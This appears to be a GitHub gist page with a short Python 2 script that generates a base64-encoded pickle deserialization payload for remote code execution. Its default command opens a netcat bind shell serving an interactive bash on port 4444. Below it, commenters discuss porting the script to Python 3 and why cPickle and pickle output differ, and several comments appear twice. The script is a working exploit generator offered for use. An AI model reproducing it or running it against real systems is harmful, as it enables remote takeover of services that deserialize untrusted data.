-
-
Save mgeeky/cbc7017986b2ec3e247aab0b01a9edcd to your computer and use it in GitHub Desktop.
#!/usr/bin/python | |
# | |
# Pickle deserialization RCE payload. | |
# To be invoked with command to execute at it's first parameter. | |
# Otherwise, the default one will be used. | |
# | |
import cPickle | |
import sys | |
import base64 | |
DEFAULT_COMMAND = "netcat -c '/bin/bash -i' -l -p 4444" | |
COMMAND = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_COMMAND | |
class PickleRce(object): | |
def __reduce__(self): | |
import os | |
return (os.system,(COMMAND,)) | |
print base64.b64encode(cPickle.dumps(PickleRce())) |
Worked like a charm. How would this change in python3 though?
Hey, @b4d7r1p I've created a python3 script. Maybe you could check it out.
Worked like a charm. How would this change in python3 though?
Change the last print statement to have brackets:
print base64.b64encode(cPickle.dumps(PickleRce()))
to print(base64.b64encode(cPickle.dumps(PickleRce())))
Worked like a charm. How would this change in python3 though?
Change the last print statement to have brackets:
print base64.b64encode(cPickle.dumps(PickleRce()))
toprint(base64.b64encode(cPickle.dumps(PickleRce())))
Yes, @Anon-Exploiter you're correct π. I did some digging, the thing is python3 doesn't have a module called cPickle. However, there is a built-in module for python3 called pickle to do the serialization stuff but the output of cPickle.dumps() vs pickle.dumps() differs. I'm not sure why that happens. Does anyone know why? I would love to know. I've also added a sketch below that explains the issue.
Have a nice day guys.
Worked like a charm. How would this change in python3 though?
Change the last print statement to have brackets:
print base64.b64encode(cPickle.dumps(PickleRce()))
toprint(base64.b64encode(cPickle.dumps(PickleRce())))
Yes, @Anon-Exploiter you're correct π. I did some digging, the thing is python3 doesn't have a module called cPickle. However, there is a built-in module for python3 called pickle to do the serialization stuff but the output of cPickle.dumps() vs pickle.dumps() differs. I'm not sure why that happens. Does anyone know why?. I've also added a sketch below that explains the issue.
Have a nice day guys.
Ah, should have tested before saying to just use print()
my bad π -- Thanks for correcting.
Btw, the end result Is the same for both:
>>> import cPickle
>>>
>>> A = [1,2,3,4,5,6]
>>>
>>> cPickle.dumps(A, protocol=0)
'(lp1\nI1\naI2\naI3\naI4\naI5\naI6\na.'
>>>
>>> cPickle.loads(cPickle.dumps(A, protocol=0))
[1, 2, 3, 4, 5, 6]
>>>
>>>
>>> import pickle
>>>
>>>
>>> pickle.loads( cPickle.dumps(A, protocol=0) )
[1, 2, 3, 4, 5, 6]
>>> pickle.loads( pickle.dumps(A, protocol=0) )
[1, 2, 3, 4, 5, 6]
>>>
>>> pickle.dumps(A, protocol=0)
'(lp0\nI1\naI2\naI3\naI4\naI5\naI6\na.'
>>>
>>>
Found this explanation:
https://stackoverflow.com/a/7501980
No problem @Anon-Exploiter. Thanks for the response π. That was a good explanation.
So I believe the conclusion is that "There is no guarantee that seemingly identical objects will produce identical pickle strings.". Which means, even though the pickle strings (serialized data) generated from cPickle.dumps() or pickle.dumps() does not give exact identical results, when deserializing them with loads() we get the same results.
Thank you @Anon-Exploiter for clearing my doubt π―. Have a nice day.
No problem @Anon-Exploiter. Thanks for the response π. That was a good explanation.
So I believe the conclusion is that "There is no guarantee that seemingly identical objects will produce identical pickle strings.". Which means, even though the pickle strings (serialized data) generated from cPickle.dumps() or pickle.dumps() does not give exact identical results, when deserializing them with loads() we get the same results.
Thank you @Anon-Exploiter for clearing my doubt π―. Have a nice day.
You're welcome! π±
Thank you @mgeeky.